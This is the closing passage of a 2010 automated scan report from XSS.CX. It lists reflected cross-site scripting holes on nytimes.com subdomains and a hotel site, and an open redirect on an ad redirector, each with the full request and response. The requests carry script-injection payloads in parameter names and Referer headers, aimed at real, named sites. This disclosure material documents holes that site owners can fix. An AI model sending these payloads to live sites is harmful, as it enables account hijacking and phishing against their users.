Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:32:09 GMT
Content-type: text/html
Content-Length: 226181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html?77337"><script>alert(1)</script>1a269a3367e=1">
...[SNIP]...

3.378. http://video.on.nytimes.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.on.nytimes.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4069"><script>alert(1)</script>6deaed5a6f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f4069"><script>alert(1)</script>6deaed5a6f3=1 HTTP/1.1
Host: video.on.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:21:01 GMT
Content-type: text/html
Content-Length: 233465

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.on.nytimes.com/?f4069"><script>alert(1)</script>6deaed5a6f3=1">
...[SNIP]...

3.379. http://homedelivery.nytimes.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://homedelivery.nytimes.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40c3d'><script>alert(1)</script>d9610dce7e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: homedelivery.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=40c3d'><script>alert(1)</script>d9610dce7e2

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:04:52 GMT
Content-type: text/html;charset=ISO-8859-1
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en
Set-cookie: JSESSIONID=00003UqU-wpicu9dplBkNJ5P8FS:12d2e99pd; Path=/
Connection: close
Content-Length: 29477

<html>
<head>

<link rel="stylesheet" href="css/HDStyles.css" type="text/css"/>
<link rel="stylesheet" type="text/css" href="css/global.css" />

</head>

<body>
<br/>
<tabl
...[SNIP]...
<a href='https://myaccount.nytimes.com/auth/hdlogin?URI=http://homedelivery.nytimes.com/HDS/HDSHome.do&OQ=modeQ3DHDSHomeQ26hlQ3DenQ26qQ3D40c3d'><script>alert(1)</script>d9610dce7e2&hd=1' onmouseover="this.style.textDecoration='underline';" onmouseout="this.style.textDecoration='none';" style="color:#004276; text-decoration: none; font-weight: bold;">
...[SNIP]...

3.380. http://ipboutiquehotel.com/ [Referer HTTP header] previous

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ipboutiquehotel.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab8f8"><script>alert(1)</script>fb840085aed was submitted in the Referer HTTP header. This input was echoed as ab8f8\"><script>alert(1)</script>fb840085aed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: ipboutiquehotel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ab8f8"><script>alert(1)</script>fb840085aed

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:11 GMT
Server: Microsoft-IIS/5.0
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=bce3a5b6be4e3c1815689ac7c999c536; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9539

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr" />
<title>::::: IP Boutique Hotel :::::</title>
<link href="./css/style_ip.css" rel="stylesheet" type="text/css" />

...[SNIP]...
<img src="http://www.ipboutiquehotel.com/log/nalogd.php?counter=cnt&url=http://www.google.com/search?hl=en&q=ab8f8\"><script>alert(1)</script>fb840085aed" width=0 height=0>
...[SNIP]...

4. Open redirection previous

Summary

Severity:	Low
Confidence:	Certain
Host:	http://50.xg4ken.com
Path:	/media/redir.php

Issue detail

The value of the url[] request parameter is used to perform an HTTP redirect. The payload http%3a//a63267a8e711960db/a%3fhttp%3a//www.perpetual.com.au/investors.aspx was submitted in the url[] parameter. This caused a redirection to the following URL:

http://a63267a8e711960db/a?http://www.perpetual.com.au/investors.aspx

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3a//a63267a8e711960db/a%3fhttp%3a//www.perpetual.com.au/investors.aspx HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 01:48:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=0742c4e3-7054-6129-5b91-0000644fa2b4; expires=Fri, 11-Feb-2011 01:48:14 GMT; path=/; domain=.xg4ken.com
Location: http://a63267a8e711960db/a?http://www.perpetual.com.au/investors.aspx
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Report generated by XSS.CX at Fri Nov 12 22:21:15 CST 2010.